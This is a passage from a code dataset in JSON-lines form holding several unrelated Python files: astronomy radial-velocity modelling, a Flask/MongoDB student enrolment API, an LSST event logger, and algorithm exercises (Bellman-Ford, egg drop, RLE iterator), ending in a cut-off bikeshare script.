\n","sub_path":"CSE480/Project2/project.py","file_name":"project.py","file_ext":"py","file_size_in_byte":10089,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"255317835","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport numpy as np\nimport emcee\nfrom astropy.io import ascii\nimport matplotlib.pyplot as plt\nfrom astropy.table import Table, Column\nimport math\nimport scipy as sp\nimport sys\nfrom PyAstronomy import pyasl\nfrom PyAstronomy.pyasl import foldAt\nimport scipy.optimize as op\nimport corner\nimport time as chrono\nfrom sympy.solvers import solve\nfrom sympy import Symbol\ntry:\n    from tqdm import tqdm\nexcept ImportError:\n    raise ImportError(\"You don't have the package tqdm installed. Try: pip install tqdm.\")\n\n\n#################\n# Take the Data #\n#################\n\nks = pyasl.MarkleyKESolver()\n\nGJ180 = 'datafiles/GJ180_weight_022_wave_4404.rv'\nGJ180_PFS = 'datafiles/GJ180_PFS.dat'\nGJ180_UVES = 'datafiles/GJ180_UVES.dat'\n# GJ180_KECK = 'HIP22762_KECK.vels'\n\nPEG51_1 = 'datafiles/51Peg_1_LICK.vels'\nPEG51_2 = 'datafiles/51Peg_2_ELODIE.vels'\n\nUPSAND_1 = 'datafiles/upsAnd_1_LICK.vels'\nUPSAND_2 = 'datafiles/upsAnd_2_ELODIE.vels'\nUPSAND_3 = 'datafiles/upsAnd_3_HJS.vels'\n\n\n# data for GJ180\ndataset_1 = np.loadtxt(GJ180, usecols=(0,1,2))\ndataset_2 = np.loadtxt(GJ180_PFS)\ndataset_3 = np.loadtxt(GJ180_UVES)\n# dataset_4 = np.loadtxt(GJ180_KECK, usecols=(0,1,2))\n\n# data for 51 Peg\ndataset_5 = np.loadtxt(PEG51_1)\ndataset_6 = np.loadtxt(PEG51_2)\n\n# data for upsilon Andromedae\ndataset_7 = np.loadtxt(UPSAND_1)\n\n# HERE you select the current dataset\n\ndata_1 = np.vstack((dataset_1, dataset_2, dataset_3)) # GJ180\ndata_2 = np.vstack((dataset_5, dataset_6)) # peg51\ndata_3 = dataset_7 # UPSAND\n# we merge the data, sort it, and get time, Radial_Velocity and the error (Err)\n\n\ndef data(data, PLOT=True, SAVE=True):\n    time = data[:, 0]\n    orden = np.argsort(time)\n    Data = data[orden]\n    time = Data[:, 0]\n    time = time - time[0]\n    Radial_Velocity = Data[:, 1]  # radial velocity column\n    Err = Data[:, 2]  # RV measurement error\n    dps = len(time)\n\n\n    if PLOT:\n        plt.clf()\n        plt.errorbar(time, Radial_Velocity, Err, marker=\"o\", linestyle=\"\", label='Data')\n        plt.xlabel('time [days]')\n        plt.ylabel('RV [m/s]')\n        plt.title('True Data', fontsize=22)\n        plt.legend(numpoints=1)\n        if SAVE:\n            plt.savefig(\"true_data.jpg\")\n        plt.draw()\n        plt.show()\n\n    return time, Radial_Velocity, Err\n\n\ntime, Radial_Velocity, Err = data(data_2)\n\ndef model(A, P, w, phase, ecc, offset, jitt, time):\n    freq = 2. * np.pi / P\n    M = freq * time + phase\n    E = np.array([ks.getE(m, ecc) for m in M])\n    f = (np.arctan(np.sqrt((1. + ecc) / (1. - ecc)) * np.tan(E / 2.)) * 2)\n    return A * (np.cos(f + w) + ecc * np.cos(w)) + offset\n\n\n# full model evaluated on an evenly spaced time grid\nmodeltime = np.linspace(0, time[len(time)-1], len(time))\nmodel_full = model(60, 4.23, 3.05, 3.05, 0.00, -9.3, 6.099, modeltime)\n'''\nfig = plt.figure(figsize=(10, 10))\nplt.clf()\nplt.errorbar(time, Radial_Velocity, marker='o', color='red', label='Data', linestyle='')\nplt.errorbar(time, model_full, color='blue', label='Model')\n\nplt.xlabel('time [days]', fontsize=18)\nplt.ylabel('RV [m/s]', fontsize=18)\nplt.title('Raw Data vs Model', fontsize=22)\nplt.legend(numpoints=1)\nplt.draw()\nplt.show()\n'''
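\n# --- Hedged sanity check (added for illustration) ---\n# model() above inverts Kepler's equation M = E - ecc*sin(E) with PyAstronomy's\n# MarkleyKESolver, exactly as the list comprehension in model() does. The quick\n# check below confirms the returned eccentric anomaly satisfies the equation;\n# the mean anomaly and eccentricity are arbitrary example values.\n_M_demo, _ecc_demo = 1.3, 0.4\n_E_demo = ks.getE(_M_demo, _ecc_demo)\nassert abs((_E_demo - _ecc_demo * np.sin(_E_demo)) - _M_demo) < 1e-8\n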
# phase-fold\n\nphases = foldAt(time, 4.23, T0=0.)  # foldAt returns each epoch's phase in [0, 1) for the given period\nsortIndi = sp.argsort(phases)  # indices that sort the phases\nPhases = phases[sortIndi]\nrv_phased = Radial_Velocity[sortIndi]  # reorder the RVs and errors the same way\nerr_phased = Err[sortIndi]\ntime_phased = Phases * 4.23  # convert phase back to time in days (P = 4.23 d)\nmodel_phased = model(65, 4.23, 2.05, 2.05, 0.00, -9.3, 6.099, time_phased)\n\n\nfig2 = plt.figure(figsize=(10, 10))\nplt.clf()\n\nplt.errorbar(time_phased, rv_phased, err_phased, color='red', marker='o', linestyle=\"\", label='Data')\nplt.errorbar(time_phased, model_phased, color='blue', label='Model')\nplt.xlabel('time [days]', fontsize=18)\nplt.ylabel('RV [m/s]', fontsize=18)\nplt.title('Phase Fold', fontsize=22)\nplt.legend(numpoints=1)\nplt.draw()\nplt.show()\n","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":3912,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"638357353","text":"n = int(input())  # number of tree nodes\nnode = [None] * n  # node[i] = (left, right); '-' marks a missing child\nflag = list(range(n))\nfor i in range(n):\n    raw = input()\n    a, b = raw.split(' ')\n    if a != '-':\n        a = int(a)\n        flag[a] = -1\n    if b != '-':\n        b = int(b)\n        flag[b] = -1\n    node[i] = a, b\n# the root is the only index that never appears as a child\nroot = 0\nfor i in flag:\n    if i != -1:\n        root = i\n        break\nprint(root)\n\nresult = []\n\nend = [999] * n  # end[i] = depth of leaf i; 999 means not a leaf\n\ndef visit(node, i, j, end):\n    if node[i][0] == '-' and node[i][1] == '-':\n        end[i] = j\n    else:\n        j += 1\n        if node[i][0] != '-':\n            visit(node, node[i][0], j, end)\n        if node[i][1] != '-':\n            visit(node, node[i][1], j, end)\n\nvisit(node, root, 0, end)\n\n# emit the leaves in order of increasing depth\ns = min(end)\nans = []\nwhile s < 999:\n    ans.append(str(end.index(s)))\n    end[end.index(s)] = 999\n    s = min(end)\n\nprint(' '.join(ans))\n","sub_path":"list leaves.py","file_name":"list leaves.py","file_ext":"py","file_size_in_byte":797,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"394821102","text":"import sys\nimport os\nimport scipy.stats.stats as stats\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\n\nimport copy\nfrom numpy import NaN\n# FixFlex = 'fixed_seg'\nFixFlex = 'flexible_seg'\n\npath = '/Users/daisy/Dropbox/test_different_time_slot/Report_com/participant_1/' + FixFlex + '/'\n# path = '/Users/daisy/Dropbox/test_different_time_slot/Report_com/participant_2/' + FixFlex + '/'\nfile_list = []\nfor each_file in os.listdir(path):  # collect every pickle file in the folder\n    if each_file.endswith('.pickle'):\n        file_list.append(each_file)\nfile_list = list(set(file_list))\n\nbi_Continuous_hourlyM = pd.read_pickle(path + 'bi_Continuous_hourlyM.pickle')\nallD = copy.deepcopy(bi_Continuous_hourlyM).set_index(['TBlock'])\n\nfor each_file in file_list:\n    DName = each_file.split('.pickle')[0]\n    if DName != 'bi_Continuous_hourlyM':\n        data = pd.read_pickle(path + each_file)\n        vars()[DName] = data\n        plt.figure()\n        plt.ylim(0, 1)\n        plt.plot(allD['bi'], label='continuous')\n        CompareD = copy.deepcopy(eval(DName)).set_index(['TBlock'])\n        plt.plot(CompareD['bi'], label=DName)\n        plt.legend()\n        plt.show()\n        m = pd.merge(allD, eval(DName), how='left', left_on='TBlock', right_on='TBlock')\n        m = m.set_index(['TBlock'])\n        m_drpNA = m.dropna()\n\n        print(stats.pearsonr(m_drpNA['bi_x'], m_drpNA['bi_y']), DName, len(m_drpNA))
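\n\n# --- Hedged mini-example (added for illustration; synthetic frames, not the participant data) ---\n# The loop above aligns each comparison series with the continuous baseline on\n# 'TBlock', drops rows missing in either series, and correlates what remains.\n# The same pattern on two toy frames:\n_a = pd.DataFrame({'TBlock': [1, 2, 3, 4], 'bi': [0.1, 0.4, 0.5, 0.9]})\n_b = pd.DataFrame({'TBlock': [1, 2, 4], 'bi': [0.2, 0.5, 0.8]})\n_m = pd.merge(_a, _b, how='left', on='TBlock').dropna()\nprint(stats.pearsonr(_m['bi_x'], _m['bi_y']))  # (correlation, p-value)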
","sub_path":"step4_check_all_crr.py","file_name":"step4_check_all_crr.py","file_ext":"py","file_size_in_byte":1482,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"465977211","text":"# -*- coding: utf-8 -*-\nfrom flask import Flask\nfrom flask import jsonify\nfrom flask import request\nfrom flask_pymongo import PyMongo\nfrom flask_swagger import swagger\nfrom models.aluno_schema import AlunoSchema\nfrom models.curso_schema import CursoSchema\nfrom models.matricula_schema import MatriculaSchema\nfrom uuid import uuid4\nfrom datetime import datetime\nfrom enum import Enum\n# from dao.db import db\n\napp = Flask(__name__)\n\n\napp.config['MONGO_DBNAME'] = 'restdb'\napp.config['MONGO_URI'] = 'mongodb://localhost:27017/restdb'\n\nmongo = PyMongo(app)\n# = \"/api/components/schemas\"\n\n\nclass Messages():\n    EMPTY = \"Dados vazios\"\n    NONE = \"Resultado não encontrado!\"\n    CREATED = \"Criado com sucesso!\"\n    UPDATED = \"Atualizado com sucesso!\"\n    DELETED = \"Removido com sucesso!\"\n    # error messages used by the aluno/curso/matricula endpoints below\n    ERROR = \"Erro ao processar a operação!\"\n    ID_ALUNO_ERROR = \"Aluno não encontrado!\"\n    ID_CURSO_ERROR = \"Curso não encontrado!\"\n\n\n@app.route(\"/spec\")\ndef spec():\n    swag = swagger(app)\n    swag['info']['version'] = \"1.0\"\n    swag['info']['title'] = \"Dibra API\"\n    return jsonify(swag)\n\n\ndef gera_id():\n    return str(uuid4())\n\n\n@app.route(\"/\")\ndef home():\n    return \" Dibra API \"\n\n\n@app.route(\"/aluno\", methods=['GET'])\ndef get_all_alunos():\n    matriculas = mongo.db.matriculas\n    alunos = mongo.db.alunos\n    retorno = []\n\n    for aluno_obj in alunos.find():\n        id_alunos = []\n        for matricula in matriculas.find():\n            if aluno_obj['id'] == matricula['id_aluno']:\n                id_alunos.append(matricula['id_aluno'])\n        id_alunos_not_equals = set(id_alunos)\n\n        soma_cursos = 0\n\n        for quantidade in id_alunos_not_equals:\n            soma_cursos = id_alunos.count(quantidade)\n\n        retorno.append(\n            {'id': aluno_obj['id'],\n             'nome': aluno_obj['nome'],\n             'sobrenome': aluno_obj['sobrenome'],\n             'data_nascimento': aluno_obj['data_nascimento'],\n             'cpf': aluno_obj['cpf'],\n             'cursos_matriculados': soma_cursos})\n    if len(retorno) == 0:\n        return jsonify({\"data\": Messages.NONE})\n\n    return jsonify({'alunos': retorno})\n\n\n@app.route(\"/aluno/<aluno_id>\", methods=['GET'])\ndef get_aluno(aluno_id=None):\n    matriculas = mongo.db.matriculas\n    alunos = mongo.db.alunos\n    aluno_obj = alunos.find_one({'id': aluno_id})\n\n    if not aluno_obj:\n        return jsonify(Messages.NONE)\n\n    id_alunos = []\n    for matricula in matriculas.find():\n        if aluno_id == matricula['id_aluno']:\n            id_alunos.append(matricula['id_aluno'])\n    id_alunos_not_equals = set(id_alunos)\n\n    soma_cursos = 0\n\n    for quantidade in id_alunos_not_equals:\n        soma_cursos = id_alunos.count(quantidade)\n\n    aluno_obj.pop('_id')\n    aluno_obj.update({'cursos_matriculados': soma_cursos})\n    return jsonify(aluno_obj)\n\n\n@app.route(\"/aluno\", methods=['POST'])\ndef create_aluno():\n    alunos = mongo.db.alunos\n    request_obj = AlunoSchema().load(request.get_json())\n\n    if request_obj.errors:\n        return jsonify({\"errorCode\": [request_obj.errors]}), 404\n\n    request_data = request_obj.data\n    nome = request_data['nome']\n    sobrenome = request_data['sobrenome']\n    data_nascimento = request_data['data_nascimento']\n    cpf = request_data['cpf']\n\n    aluno_id = gera_id()\n\n    alunos.insert_one({\n        'id': aluno_id,\n        'nome': nome,\n        'sobrenome': sobrenome,\n        'data_nascimento': data_nascimento,\n        'cpf': cpf})\n\n    return jsonify({'data': Messages.CREATED, \"id\": aluno_id}), 200
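\n\n# --- Hedged usage sketch (added for illustration; commented out so the module only runs the app) ---\n# Example client calls against the /aluno endpoints above, using the requests\n# package; host and port follow app.run() at the bottom, and the field values\n# are made up:\n#\n#   import requests\n#   r = requests.post(\"http://localhost:5000/aluno\", json={\n#       \"nome\": \"Maria\", \"sobrenome\": \"Silva\",\n#       \"data_nascimento\": \"2000-01-31\", \"cpf\": \"12345678900\"})\n#   aluno_id = r.json()[\"id\"]\n#   print(requests.get(\"http://localhost:5000/aluno/%s\" % aluno_id).json())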
\n\n\n@app.route(\"/aluno/<aluno_id>\", methods=['PUT'])\ndef set_aluno_name(aluno_id):\n    request_data = request.get_json()\n    nome = request_data['nome']\n    sobrenome = request_data['sobrenome']\n    data_nascimento = request_data['data_nascimento']\n    cpf = request_data['cpf']\n\n    mongo.db.alunos.update_one(\n        {\"id\": aluno_id},\n        {\n            \"$set\": {\n                \"nome\": nome,\n                \"sobrenome\": sobrenome,\n                \"data_nascimento\": data_nascimento,\n                \"cpf\": cpf\n            }\n        }\n    )\n\n    return jsonify({\"data\": Messages.UPDATED})\n\n\n@app.route(\"/aluno/<aluno_id>\", methods=['DELETE'])\ndef delete_aluno(aluno_id):\n    mongo.db.alunos.remove({'id': aluno_id})\n\n    alunos = mongo.db.alunos\n    aluno_obj = alunos.find_one({'id': aluno_id})\n    if aluno_obj is not None:\n        retorno = Messages.EMPTY\n    else:\n        retorno = Messages.DELETED\n    return jsonify({'data': retorno})\n\n\n@app.route(\"/aluno/totais/<aluno_id>\", methods=['GET'])\ndef get_totais_alunos(aluno_id):\n    matriculas = mongo.db.matriculas\n    alunos = mongo.db.alunos\n\n    id_alunos = []\n    for matricula in matriculas.find():\n        if aluno_id == matricula['id_aluno']:\n            id_alunos.append(matricula['id_aluno'])\n    id_alunos_not_equals = set(id_alunos)\n\n    soma_alunos = 0\n\n    for quantidade in id_alunos_not_equals:\n        soma_alunos = id_alunos.count(quantidade)\n\n    return jsonify({'Total de cursos matriculados': soma_alunos})\n\n\n@app.route(\"/curso\", methods=['GET'])\ndef get_all_cursos():\n    matriculas = mongo.db.matriculas\n    cursos = mongo.db.cursos\n    retorno = []\n    for curso_obj in cursos.find():\n        id_cursos = []\n        for matricula in matriculas.find():\n            if curso_obj['id'] == matricula['id_curso']:\n                id_cursos.append(matricula['id_curso'])\n        id_cursos_not_equals = set(id_cursos)\n\n        soma_cursos = 0\n\n        for quantidade in id_cursos_not_equals:\n            soma_cursos = id_cursos.count(quantidade)\n\n        retorno.append(\n            {'id': curso_obj['id'],\n             'nome': curso_obj['nome'],\n             'carga_horaria': curso_obj['carga_horaria'],\n             'quantidade de inscritos': soma_cursos})\n\n    if len(retorno) == 0:\n        return jsonify({\"message\": Messages.EMPTY})\n\n    return jsonify({'data': retorno})\n\n\n@app.route(\"/curso/<curso_id>\", methods=['GET'])\ndef get_curso(curso_id=None):\n    matriculas = mongo.db.matriculas\n    cursos = mongo.db.cursos\n    curso_obj = cursos.find_one({'id': curso_id})\n\n    if not curso_obj:\n        return jsonify({\"message\": Messages.ID_CURSO_ERROR})\n\n    id_cursos = []\n\n    for matricula in matriculas.find():\n        if curso_obj['id'] == matricula['id_curso']:\n            id_cursos.append(matricula['id_curso'])\n    id_cursos_not_equals = set(id_cursos)\n\n    soma_cursos = 0\n\n    for quantidade in id_cursos_not_equals:\n        soma_cursos = id_cursos.count(quantidade)\n\n    curso_obj.pop('_id')\n    curso_obj.update({'quantidade de inscritos': soma_cursos})\n\n    return jsonify(curso_obj)\n\n\n@app.route(\"/curso\", methods=['POST'])\ndef create_curso():\n    request_obj = CursoSchema().load(request.get_json())\n    if request_obj.errors:\n        return jsonify({\"errorCode\": [request_obj.errors]})\n\n    nome = request.json['nome']\n    carga_horaria = request.json['carga_horaria']\n\n    cursos = mongo.db.cursos\n    cursos.insert_one({\n        'id': gera_id(),\n        'nome': nome,\n        'carga_horaria': carga_horaria})\n\n    return jsonify({'data': Messages.CREATED})\n\n\n@app.route(\"/curso/<curso_id>\", methods=['PUT'])\ndef update_curso(curso_id=None):\n    request_obj = CursoSchema().load(request.get_json())\n    if request_obj.errors:\n        return jsonify({\"errorCode\": [request_obj.errors]})\n\n    request_data = request_obj.data\n    mongo.db.cursos.update_one(\n        {\"id\": curso_id},\n        {\n            \"$set\": {\n                \"nome\": request_data['nome'],\n                \"carga_horaria\": request_data['carga_horaria']\n            }\n        }\n    )\n\n    return jsonify({\"data\": Messages.UPDATED}), 201\n\n\n@app.route(\"/curso/<curso_id>\", methods=['DELETE'])\ndef delete_curso(curso_id=None):\n    mongo.db.cursos.remove({'id': curso_id})\n\n    cursos = mongo.db.cursos\n    curso_obj = cursos.find_one({'id': curso_id})\n    if curso_obj is not None:\n        retorno = \"Erro ao excluir curso\"\n    else:\n        retorno = Messages.DELETED\n    return jsonify({'data': retorno})
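\n\n# --- Hedged aside (added for illustration; assumes pymongo 3.7+) ---\n# The per-curso totals below are computed by looping over every matricula in\n# Python; MongoDB can also do the counting server side, e.g.:\n#\n#   mongo.db.matriculas.count_documents({'id_curso': curso_id})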
\n\n\n@app.route(\"/curso/totais\", methods=['GET'])\ndef get_totais():\n    matriculas = mongo.db.matriculas\n    cursos = mongo.db.cursos\n\n    id_cursos = []\n    for matricula in matriculas.find():\n        id_cursos.append(matricula['id_curso'])\n\n    id_cursos_not_equals = set(id_cursos)\n    nome_cursos = []\n\n    for curso in id_cursos_not_equals:\n        cursos_obj = cursos.find_one({'id': curso})\n        if cursos_obj:\n            nome = cursos_obj['nome']\n            nome_cursos.append(nome)\n\n    soma_cursos = []\n\n    for quantidade in id_cursos_not_equals:\n        soma_cursos.append(id_cursos.count(quantidade))\n\n    dict_cursos = dict(zip(nome_cursos, soma_cursos))\n\n    return jsonify({'Totais de matriculados': dict_cursos})\n\n\n@app.route(\"/matricula\", methods=['POST'])\ndef create_matricula():\n    alunos = mongo.db.alunos\n    cursos = mongo.db.cursos\n    matriculas = mongo.db.matriculas\n    id_aluno = request.json['id_aluno']\n    id_curso = request.json['id_curso']\n    data = datetime.now()\n\n    valid_id_aluno = alunos.find_one({'id': id_aluno})\n    if not valid_id_aluno:\n        retorno = Messages.ID_ALUNO_ERROR\n        return jsonify(retorno)\n\n    valid_id_curso = cursos.find_one({'id': id_curso})\n    if not valid_id_curso:\n        return jsonify(Messages.ID_CURSO_ERROR)\n    id = gera_id()\n    matriculas.insert_one({\n        'id': id,\n        'id_aluno': id_aluno,\n        'id_curso': id_curso,\n        'data': data})\n\n    return jsonify({'data': Messages.CREATED, \"id\": id})\n\n\n@app.route(\"/matricula/<matricula_id>\", methods=['DELETE'])\ndef delete_matricula(matricula_id):\n    mongo.db.matriculas.remove({'id': matricula_id})\n\n    matriculas = mongo.db.matriculas\n    matricula_obj = matriculas.find_one({'id': matricula_id})\n    if matricula_obj is not None:\n        retorno = Messages.ERROR\n    else:\n        retorno = Messages.DELETED\n    return jsonify({'mensagem': retorno})\n\n\nif __name__ == '__main__':\n    app.run(port=5000, debug=True)\n","sub_path":"app_main.py","file_name":"app_main.py","file_ext":"py","file_size_in_byte":9851,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"524965150","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\n# +\n# import(s)\n# -\nimport time\nfrom OcsLogger import *\nfrom SALPY_archiver import *\n\n\n# +\n# __doc__ string\n# -\n__doc__ = \"\"\"Event logger for specific event in the DMCS Archiver\"\"\"\n\n\n# +\n# dunder string(s)\n# -\n__author__ = \"Philip N. Daly\"\n__copyright__ = u\"\\N{COPYRIGHT SIGN} AURA/LSST 2017. All rights reserved. Released under the GPL.\"
\n__date__ = \"17 January 2017\"\n__email__ = \"pdaly@lsst.org\"\n__file__ = \"logevent_archiverEntitySummaryState.py\"\n__history__ = __date__ + \": \" + \"original version (\" + __email__ + \")\"\n__version__ = \"0.1.0\"\n\n\n# +\n# main()\n# -\nif __name__ == \"__main__\":\n\n    # get a logger\n    evlog = OcsLogger('Events', 'archiverEntitySummaryState')\n    evlog.logger.info('{0:s} starting up'.format(__file__))\n\n    # connect to SAL\n    mgr = SAL_archiver()\n\n    # set up for specific event\n    mgr.salEvent('archiver_logevent_archiverEntitySummaryState')\n\n    # create event container\n    event = archiver_logevent_archiverEntitySummaryStateC()\n\n    # log message\n    evlog.logger.info('{0:s} ready'.format(__file__))\n\n    # loop forever\n    while True:\n        retval = mgr.getEvent_archiverEntitySummaryState(event)\n        if retval == 0:\n            evlog.logger.info('{0:s} event received'.format(__file__))\n            evlog.logger.info('\\tevent.Address = {0:d}'.format(event.Address))\n            evlog.logger.info('\\tevent.CommandsAvailable = {0:s}'.format(event.CommandsAvailable))\n            evlog.logger.info('\\tevent.ConfigurationsAvailable = {0:s}'.format(event.ConfigurationsAvailable))\n            evlog.logger.info('\\tevent.Executing = {0:s}'.format(event.Executing))\n            evlog.logger.info('\\tevent.Identifier = {0:.17f}'.format(event.Identifier))\n            evlog.logger.info('\\tevent.Name = {0:s}'.format(event.Name))\n            evlog.logger.info('\\tevent.CurrentState = {0:s}'.format(event.CurrentState))\n            evlog.logger.info('\\tevent.PreviousState = {0:s}'.format(event.PreviousState))\n            evlog.logger.info('\\tevent.Timestamp = {0:s}'.format(event.Timestamp))\n            evlog.logger.info('\\tevent.priority = {0:d}'.format(event.priority))\n        time.sleep(1)\n\n    # shutdown\n    # evlog.logger.info('{0:s} shutting down'.format(__file__))\n    # mgr.salShutdown()\n    # exit()\n","sub_path":"bin/logevent_archiverEntitySummaryState.py","file_name":"logevent_archiverEntitySummaryState.py","file_ext":"py","file_size_in_byte":2415,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"184692986","text":"import numpy as np\n\nurl = 'https://archive.ics.uci.edu/ml/machine-learning-databases/iris/iris.data'\niris_2d = np.genfromtxt(url, delimiter=',', dtype='float', usecols=[0,1,2,3])\n# knock out 20 random entries to create missing values\niris_2d[np.random.randint(150, size=20), np.random.randint(4, size=20)] = np.nan\n\n# Solution: replace every NaN with 0\niris_2d[np.isnan(iris_2d)] = 0\na = iris_2d[:4]\nprint(a)","sub_path":"在numpy数组中用0替换所有缺失值.py","file_name":"在numpy数组中用0替换所有缺失值.py","file_ext":"py","file_size_in_byte":326,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"17649441","text":"#!/usr/bin/env python\n# encoding: utf-8\n\n# Time: O(V*E)\n\"\"\"\n@author: changxin\n@mail: PyCharm\n@file: bellman_ford.py\n@time: 2018/5/14 08:17\n\"\"\"\nimport sys\n\nfrom basic.graph.graph import Graph\n\"\"\"\nsingleSourceShortest\nWorks on graphs that contain negative edge weights, as long as there is no negative cycle.\nA few benchmark-based observations reported by others:\nBellman-Ford degrades sharply on dense graphs;\nDijkstra with a priority queue performs very well on sparse graphs.\n\"\"\"\n\n\nclass BellmanFord(object):\n\n    def __init__(self, graph):\n        self.graph = graph\n        self.pred = {}\n        self.dist = {}\n\n        for node_key in graph.nodes:\n            self.pred[node_key] = -1\n            self.dist[node_key] = sys.maxsize\n\n    def bellman_ford(self, start_node_key, end_node_key=None):\n        self.dist[start_node_key] = 0\n        n = len(self.graph.nodes)\n        for i in range(n):\n            fail_on_update = (i == n-1)\n            leave_early = True\n            # For every vertex, try to shorten its best known distance from\n            # start_node. The first n-1 rounds are enough to settle every\n            # vertex, so an update that still succeeds in round n can only\n            # mean the graph contains a negative cycle.\n            for current_node in self.graph.nodes.values():\n                
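# Relaxation step (descriptive comment added for clarity): for each edge\n                # current_node -> node, test whether routing through current_node\n                # beats the best known distance to node; if it does, record the\n                # shorter distance and remember the predecessor that produced it.\n                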
for node in current_node.adj_nodes.values():\n                    weight = current_node.adj_weights[node.key]\n                    new_weight = weight + self.dist[current_node.key]\n                    if new_weight < self.dist[node.key]:\n                        if fail_on_update:\n                            raise ValueError('Graph has negative cycle')\n                        self.dist[node.key] = new_weight\n                        self.pred[node.key] = current_node.key\n                        leave_early = False\n            # if a full pass over all edges updated nothing, every distance is\n            # already optimal and the algorithm can stop early\n            if leave_early:\n                break\n\n        if end_node_key:\n            return self.full_path(end_node_key)\n\n    def full_path(self, end_node_key):\n        result = []\n        current_node_key = end_node_key\n        while current_node_key != -1:\n            result.append(current_node_key)\n            current_node_key = self.pred[current_node_key]\n        return result[::-1]\n\n\n\nif __name__ == '__main__':\n    pass","sub_path":"algorithm/basic/graph/bellman_ford.py","file_name":"bellman_ford.py","file_ext":"py","file_size_in_byte":2289,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"34295664","text":"\n\"\"\"\nYou are given K eggs and a building with N floors numbered 1 to N.\n\nEvery egg behaves identically: once an egg breaks, it cannot be dropped again.\n\nThere is a floor F with 0 <= F <= N such that an egg dropped from any floor\nhigher than F breaks, while an egg dropped from floor F or below does not.\n\nOn each move you may take an egg (if you still have an intact one) and drop it\nfrom any floor X with 1 <= X <= N.\n\nYour goal is to determine the value of F with certainty.\n\nWhatever the initial value of F, what is the minimum number of moves needed to\ndetermine F?\n\nExample 1:\nInput: K = 1, N = 2\nOutput: 2\nExplanation:\nDrop the egg from floor 1. If it breaks, we know F = 0.\nOtherwise drop it from floor 2. If it breaks, F = 1; if not, F = 2.\nSo in the worst case 2 moves are needed.\n\nExample 2:\nInput: K = 2, N = 6\nOutput: 3\n\nExample 3:\nInput: K = 3, N = 14\nOutput: 4\n\nConstraints:\n1 <= K <= 100\n1 <= N <= 10000\n\nSource: LeetCode\nLink: https://leetcode-cn.com/problems/super-egg-drop\nCopyright belongs to LeetCode-CN; please credit the source for\nnon-commercial reuse.\n\"\"\"\n\n\"\"\"\ndp[k][m] is the maximum number of floors that can be distinguished with\nk eggs and m moves.\n\nViewed from that angle, let dp[k][m] cover L floors. After choosing the first\nfloor to drop from, the egg either breaks or survives, which splits L into\nthree parts:\nthe segment below, where the egg broke, of length dp[k-1][m-1] (one egg is gone);\nthe segment above, where it survived, of length dp[k][m-1];\nplus the chosen floor itself, which contributes 1.\n\nHence the recurrence:\ndp[k][m] = dp[k - 1][m - 1] + dp[k][m - 1] + 1\n\"\"\"\n\nclass Solution:\n    def superEggDrop(self, K: int, N: int) -> int:\n        dp = [0] * (K + 1)  # dp[k] holds dp[k][m] for the current move count m\n        m = 0\n        while dp[K] < N:\n            m += 1\n            for k in range(K, 0, -1):  # go downward so dp[k-1] still holds last round's value\n                dp[k] = dp[k - 1] + dp[k] + 1\n        return m","sub_path":"medium/887-superEggDrop.py","file_name":"887-superEggDrop.py","file_ext":"py","file_size_in_byte":2068,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"190688314","text":"\"\"\"\n900\nmedium\nRLE iterator\n\"\"\"\n\nfrom typing import List\n\nclass RLEIterator:\n\n    # Naive approach: decode the whole run-length encoding up front.\n    # Correct, but can TLE when the run lengths are very large.\n\n    def __init__(self, encoding: List[int]):\n        self.decoded = []\n        self.counter = 0\n        i = 0\n        while i < len(encoding):\n            rep = encoding[i]\n            num = encoding[i+1]\n            for _ in range(rep):\n                self.decoded.append(num)\n            i += 2\n\n\n    def next(self, n: int) -> int:\n        self.counter += n\n        # the counter is 1-based after advancing, so <= (not <) keeps the\n        # final element reachable\n        if self.counter <= len(self.decoded):\n            return self.decoded[self.counter-1]\n        else:\n            return -1\n\n# Your RLEIterator object will be instantiated and called as such:\n# obj = RLEIterator(encoding)\n# param_1 = obj.next(n)","sub_path":"Q900.py","file_name":"Q900.py","file_ext":"py","file_size_in_byte":713,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"36852411","text":"import time\nimport pandas as pd\nimport numpy as np\nimport calendar as cal\n\nCITY_DATA = { 'chicago': 'chicago.csv',\n              'new york city': 'new_york_city.csv',\n              'washington': 'washington.csv' }\n\ndef get_filters():\n    \"\"\"\n    Asks user to specify a city, month, and day to analyze.\n\n    Returns:\n        (str) city - name of the city to analyze\n        (str) month - name of the month 
to filter by, or \"all\" to apply no month filter\n (str) day - name of the day of week to filter by, or \"all\" to apply no day filter\n \"\"\"\n print('Hello! Let\\'s explore some US bikeshare data!')\n # get user input for city (chicago, new york city, washington). HINT: Use a while loop to handle invalid inputs\n city_check = ('chicago', 'chi', 'new york city', 'ny', 'washington', 'was')\n while True:\n city = input('Which city? Chicago(CHI), New York City (NY), or Washington (WAS)? ')\n if city.lower() in city_check:\n break\n print('Your entry is not a valid city. Please reenter city.')\n\n if city.lower() == 'chi':\n city = 'Chicago'\n elif city.lower() == 'ny':\n city = 'New York City'\n elif city.lower() == 'was':\n city = 'Washington'\n\n # get user input for month (all, january, february, ... , june)\n month_check = ('all', 'january', 'february', 'march', 'april', 'may', 'june')\n while True:\n month = input('Which month ? All, January, February, March, April, May, or June? ')\n if month.lower() in month_check:\n break\n print('Your entry is not a valid month. Please reenter month.')\n\n # get user input for day of week (all, monday, tuesday, ... sunday)\n day_check = ('all','sunday', 'monday', 'tuesday', 'wednesday', 'thursday', 'friday', 'saturday')\n while True:\n day = input('Which day of the week? All, Sunday, Monday, Tuesday, 